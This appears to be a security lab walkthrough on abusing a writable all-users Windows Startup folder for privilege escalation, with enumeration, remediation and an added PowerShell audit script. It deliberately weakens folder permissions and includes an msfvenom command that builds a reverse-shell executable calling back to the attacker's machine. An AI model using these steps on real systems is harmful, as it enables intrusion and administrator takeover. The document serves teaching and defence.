Logon Autostart Execution via the Startup folder is a Windows feature that launches the programs or scripts placed in that folder automatically when a user logs on, without any manual action from the user.
Attackers may abuse this feature by placing malicious software in the Startup folder, so that it runs automatically at the next logon. Because the folder under ProgramData is shared by all users, a program planted there executes in the security context of every user who subsequently logs on, including administrators, which can grant the malicious code elevated privileges.
- Navigate in File Explorer to the directory that contains the Startup folder, using the following path:
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
Outcome:
- Right click on Startup folder and choose properties option:
- Choose the 'Security' tab and select the 'Users' group:
- Assign Full Control or Read and Write permissions to the Users group and then press the 'Apply' button:
To set up the lab with the 'Logon Autostart Execution (Startup Folder)' scenario use the custom PowerShell script named LogonAutostartExecutionStartupFolder.ps1.
Open a PowerShell session with local Administrator privileges and run the script:
.\LogonAutostartExecutionStartupFolder.ps1
Outcome:
To perform manual enumeration and identify whether a Windows workstation is vulnerable to the Startup Folder Autoruns issue, you can use the following command from a command prompt:
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Outcome:
To enumerate the Startup Folder Autoruns vulnerability, you can also use accesschk.exe or accesschk64.exe from the Sysinternals Suite and execute the following command with the appropriate arguments:
accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
Outcome:
- Use msfvenom to generate a malicious executable (exe) file that will run when the victim's machine boots:
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > shell.exe
- Transfer the malicious executable file to the victim's machine.
- Move the malicious executable file to 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'.
Outcome:
- Open a listener on your Kali machine.
- Reboot the victim's machine and log in as Administrator:
- Verify the reverse shell on your Kali machine:
Properly configured permissions on the Startup folder prevent unauthorized users from adding or modifying files in the directory, which removes the opportunity for malicious programs or scripts to launch automatically at logon.
To restore the default permissions of the Startup folder, run the following commands with elevated privileges:
takeown /F "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /A /R /D Y
and
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" /reset /T /C /Q
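The following PowerShell script is an added example and is not part of the lab material or the LogonAutostartExecutionStartupFolder.ps1 script described above. It turns the manual icacls/accesschk enumeration into a repeatable check: it reads the ACL of the all-users Startup folder with Get-Acl, reports any Allow entry that grants write-type rights to a low-privileged principal, inventories the files currently in the folder (owner and SHA-256) so they can be compared against a known-good baseline, and wraps the two remediation commands quoted above in a function that re-audits the folder afterwards. The list of low-privileged principal names and the set of rights treated as "write" are assumptions for this example; adjust them for your environment.

```powershell
# Added example (not from the original lab): audit and restore the ACL of the
# all-users Startup folder. Requires Windows PowerShell 5.1 or PowerShell 7 on
# Windows; Repair-StartupFolderAcl must run from an elevated session.

$StartupFolder = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'

# Principals that should never hold write access to a machine-wide autostart
# location. This list is an assumption for the example; extend it with any
# domain groups that contain all of your users.
$LowPrivPrincipals = @(
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'Everyone',
    'NT AUTHORITY\INTERACTIVE'
)

# Any of these rights lets the holder plant or replace a file in the folder,
# or change the ACL so that they can. (Assumed set for this example.)
$WriteRights = [System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
               [System.Security.AccessControl.FileSystemRights]::Write -bor
               [System.Security.AccessControl.FileSystemRights]::Modify -bor
               [System.Security.AccessControl.FileSystemRights]::FullControl -bor
               [System.Security.AccessControl.FileSystemRights]::ChangePermissions -bor
               [System.Security.AccessControl.FileSystemRights]::TakeOwnership

function Get-StartupFolderWeakAce {
    # Returns one object per Allow ACE that gives a low-privileged principal
    # write-type rights on the folder. An empty result means the folder is
    # not writable by those principals.
    param([string]$Path = $StartupFolder)

    $acl = Get-Acl -LiteralPath $Path
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        $identity = $ace.IdentityReference.Value
        if ($LowPrivPrincipals -notcontains $identity) { continue }
        if (($ace.FileSystemRights -band $WriteRights) -eq 0) { continue }

        [pscustomobject]@{
            Path      = $Path
            Identity  = $identity
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Get-StartupFolderInventory {
    # Lists every file in the folder (including hidden ones such as desktop.ini)
    # with its owner and hash, so unexpected additions stand out against a baseline.
    param([string]$Path = $StartupFolder)

    Get-ChildItem -LiteralPath $Path -File -Force | ForEach-Object {
        [pscustomobject]@{
            Name          = $_.Name
            Owner         = (Get-Acl -LiteralPath $_.FullName).Owner
            LastWriteTime = $_.LastWriteTime
            SHA256        = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    }
}

function Repair-StartupFolderAcl {
    # Runs the same two commands the lab uses for remediation, then re-audits
    # so the caller gets evidence that the reset actually removed the weak ACEs.
    param([string]$Path = $StartupFolder)

    takeown.exe /F $Path /A /R /D Y | Out-Null
    icacls.exe $Path /reset /T /C /Q | Out-Null
    Get-StartupFolderWeakAce -Path $Path
}

# Default action when the script is run: report, do not change anything.
$weak = @(Get-StartupFolderWeakAce)
if ($weak.Count -eq 0) {
    Write-Output "No low-privileged principal has write access to $StartupFolder"
} else {
    Write-Warning "Startup folder is writable by low-privileged principals:"
    $weak | Format-Table -AutoSize
}
Write-Output "Current contents of $StartupFolder:"
Get-StartupFolderInventory | Format-Table -AutoSize
```

Run the script as-is to audit; after confirming the finding, call `Repair-StartupFolderAcl` from an elevated prompt and treat any object it still returns as a sign that the reset did not take effect (for example because a non-inherited ACE is reapplied by policy). The inventory output is only useful if you keep a copy from a known-good state to diff against.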